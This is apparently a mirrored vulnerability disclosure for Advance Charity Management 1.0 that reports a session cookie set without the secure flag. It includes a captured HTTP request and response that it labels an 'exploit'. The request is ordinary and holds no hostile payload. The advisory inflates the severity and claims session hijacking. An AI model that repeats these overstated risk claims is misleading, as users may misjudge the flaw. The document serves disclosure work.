Vulners
Lucene search
Advance Charity Management 1.0 Insecure Settings
`## Title: Advance Charity Management-1.0 - TLS cookie without secure
flag set-PHPSESSID NEVER EXPIRATION-current session-Hijacking
## Author: nu11secur1ty
## Date: 06.04.2023
## Vendor: https://www.sourcecodester.com/users/aown-shah
## Software: https://www.sourcecodester.com/php/16607/advance%C2%A0charity-management-system.html
## Reference: https://portswigger.net/kb/issues/00500600_cookie-without-httponly-flag-set
## Description:
The following cookie was issued by the application and does not have
the secure flag set:
PHPSESSID: The cookie appears to contain a session token, which may
increase the risk associated with this issue. You should review the
contents of the cookie to determine its function. The attacker can use
the same browser on the same machine to connect with the already
logged user before this moment, end he can do very nasty stuff with
this already authenticated account. This is a 100% CRITICAL SITUATION
if this will happen
inside of the network level 2 of some companies.
STATUS: HIGH Vulnerability
[+]Exploit:
```GET
GET /pwnedhost7/members/ HTTP/1.1
Host: pwnedhost7.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91
Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Referer: https://pwnedhost7.com/pwnedhost7/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="114", "Chromium";v="114"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
[+]Response:
```HTTP
HTTP/1.1 200 OK
Date: Sun, 04 Jun 2023 10:13:00 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Set-Cookie: PHPSESSID=hudiao5n9p6rjld5oaju24lbca; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25629
<script type="text/javascript">window.location="login.php"; </script><br />
<b>Notice</b>: Undefined index: rainbow_uid in
<b>C:\xampp7.4\htdocs\pwnedhost7\members\header.php</b> on line
<b>7</b><br />
<br />
<b>Warning</b>: mysqli_fetch_assoc() expects parameter 1 to be
mysqli_result, bool given in
<b>C:\xampp7.4\htdocs\pwnedhost7\members\header.php</b> on line
<b>12</b>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Aown-Shah/2023/Advance-Charity-Management-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/advance-charity-management-10-tls.html)
## Time spend:
00:37:00
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jun 2023 00:00Current
7.1High risk
Vulners AI Score7.1